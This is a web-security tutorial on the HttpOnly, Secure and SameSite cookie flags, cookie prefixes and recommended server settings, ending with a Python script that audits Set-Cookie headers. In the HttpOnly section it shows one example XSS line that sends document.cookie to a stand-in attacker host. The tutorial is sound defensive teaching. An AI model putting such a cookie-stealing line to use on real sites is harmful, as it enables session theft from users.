
Cookie Security Flags: HttpOnly, Secure, SameSite

Why Cookie Security Is Critical

Cookies are the primary mechanism for session storage and authentication on the web. Misconfigured cookies open doors to attacks: session theft via XSS, request forgery via CSRF, and data interception over HTTP. Three key flags — HttpOnly, Secure, and SameSite — close most of these vulnerabilities.

The HttpOnly Flag

The HttpOnly flag prevents JavaScript from accessing the cookie. The browser sends the cookie with HTTP requests, but document.cookie cannot see it.

Without this flag, an attacker can inject a script through an XSS vulnerability and steal the session cookie:

// XSS attack without HttpOnly
new Image().src = "https://evil.com/steal?c=" + document.cookie;

With the HttpOnly flag, this attack is impossible — JavaScript simply has no access to the cookie.

When to use: always for session cookies and authentication tokens. Do not set it for cookies that JavaScript needs (e.g., theme or language preferences).

Set-Cookie: session_id=abc123; HttpOnly; Path=/

The Secure Flag

The Secure flag ensures the cookie is only transmitted over an encrypted HTTPS (SSL/TLS) connection. Without this flag, the cookie can be intercepted during HTTP transmission — for example, on public Wi-Fi networks.

Man-in-the-middle attack without the Secure flag:

  1. User connects to public Wi-Fi
  2. Browser sends an HTTP request (before the HTTPS redirect)
  3. Cookie is transmitted in plaintext
  4. Attacker intercepts the session

When to use: always, if your site runs on HTTPS (and it should). All session and authentication cookies must have this flag.

Set-Cookie: session_id=abc123; Secure; HttpOnly; Path=/

The SameSite Attribute

The SameSite attribute controls whether the cookie is sent with cross-site requests. It is the primary defense against CSRF attacks.

SameSite=Strict

The cookie is never sent with cross-site requests. Maximum security, but it can hurt UX — if a user follows a link to your site from an email, they won't be logged in.

SameSite=Lax

The cookie is sent with top-level navigation (clicking a link) but not with POST requests, iframes, or AJAX from other sites. This is the default value in modern browsers — a good balance of security and usability. Still, set it explicitly rather than relying on the browser default.

SameSite=None

The cookie is sent with all cross-site requests. Requires the Secure flag. Use only when the cookie is genuinely needed on another domain (widgets, OAuth, iframe integrations).

// Recommended settings for session cookie
Set-Cookie: session_id=abc123; HttpOnly; Secure; SameSite=Lax; Path=/

// For cross-site widget
Set-Cookie: widget_token=xyz; Secure; SameSite=None; Path=/

Additional Cookie Attributes

Domain

Defines which domain can access the cookie. Without the Domain attribute, the cookie is bound to the exact domain only. With Domain=.example.com, it's accessible to all subdomains.

Recommendation: don't set Domain unless necessary. The narrower the scope, the more secure.

Path

Restricts the cookie to a specific path. Path=/admin means the cookie is only sent for requests to /admin and nested paths. Note that Path is a scoping convenience, not a security boundary: the browser does not isolate cookies by path, so a page on the same origin under a different path can still reach the cookie (for example through a same-origin iframe). Use separate hosts if you need real isolation.

Max-Age and Expires

Max-Age sets the cookie's lifetime in seconds. Expires sets an absolute date. Without either, the cookie is a session cookie and is deleted when the browser closes.

Set-Cookie: remember_me=token; Max-Age=2592000; HttpOnly; Secure; SameSite=Lax

Cookie Prefixes: __Host- and __Secure-

Special name prefixes make the browser enforce attributes the server might forget. A cookie whose name starts with __Secure- is accepted only if it carries the Secure flag and is set from a secure (HTTPS) origin. A cookie whose name starts with __Host- must additionally have Path=/ and no Domain attribute, which binds it to exactly one host and prevents a subdomain from setting or overwriting it. The browser rejects a prefixed cookie that violates these rules:

Set-Cookie: __Host-session=abc123; Secure; HttpOnly; SameSite=Lax; Path=/

Recommended Configuration

For a typical web application:

// PHP (the array form of session_set_cookie_params requires PHP 7.3+)
session_set_cookie_params([
    'lifetime' => 0,      // Session cookie: deleted when the browser closes
    'path'     => '/',
    'domain'   => '',     // Current domain only
    'secure'   => true,   // HTTPS only
    'httponly' => true,   // No JS access
    'samesite' => 'Lax',  // CSRF protection
]);

How to Check Cookie Settings

Use the Enterno.io Security Scanner to check your website's security headers, including cookie settings. In Chrome DevTools, you can view cookies under Application → Cookies, where all flags for each cookie are visible.
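As an added example that is not part of the original article, the following Python code applies the checks described above to raw Set-Cookie header values: the three flags for session cookies, the SameSite=None/Secure rule, and the __Host-/__Secure- prefix requirements. The sample headers are constructed; a real audit would feed it the headers from your server's actual responses.

```python
def parse_set_cookie(header: str) -> tuple[str, dict]:
    """Return (cookie name, {lower-cased attribute: value}); bare flags map to ""."""
    parts = [p.strip() for p in header.split(";")]
    name, _, _value = parts[0].partition("=")
    attrs = {}
    for part in parts[1:]:
        if part:  # tolerate a trailing ';'
            k, _, v = part.partition("=")
            attrs[k.strip().lower()] = v.strip()
    return name.strip(), attrs


def audit_cookie(header: str, session_cookie: bool = True) -> list[str]:
    """Return findings for one Set-Cookie header; an empty list means it passes.
    session_cookie=False skips the HttpOnly check for cookies JavaScript needs."""
    name, a = parse_set_cookie(header)
    findings = []
    if session_cookie and "httponly" not in a:
        findings.append("missing HttpOnly")
    if "secure" not in a:
        findings.append("missing Secure")
    if "samesite" not in a:
        findings.append("missing SameSite (set Lax or Strict explicitly)")
    elif a["samesite"].lower() == "none" and "secure" not in a:
        findings.append("SameSite=None requires Secure")
    # Prefix rules browsers enforce: __Host- needs Secure, Path=/ and no Domain;
    # __Secure- needs Secure. A prefixed cookie that breaks them is rejected.
    if name.startswith("__Host-"):
        if "secure" not in a:
            findings.append("__Host- requires Secure")
        if a.get("path") != "/":
            findings.append("__Host- requires Path=/")
        if "domain" in a:
            findings.append("__Host- forbids Domain")
    elif name.startswith("__Secure-") and "secure" not in a:
        findings.append("__Secure- requires Secure")
    return findings


# Constructed sample headers (not captured from any real site)
SAMPLES = [
    "session_id=abc123; HttpOnly; Secure; SameSite=Lax; Path=/",
    "session_id=abc123; Path=/",
    "widget_token=xyz; SameSite=None; Path=/",
    "__Host-session=abc123; Secure; HttpOnly; SameSite=Lax; Domain=.example.com",
]
if __name__ == "__main__":
    for h in SAMPLES:
        print(h, "->", audit_cookie(h) or ["OK"])
```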

Summary

Three flags — HttpOnly, Secure, SameSite — are mandatory for all session cookies. They protect against XSS session theft, MITM interception, and CSRF attacks. Configure them once and close an entire class of vulnerabilities.
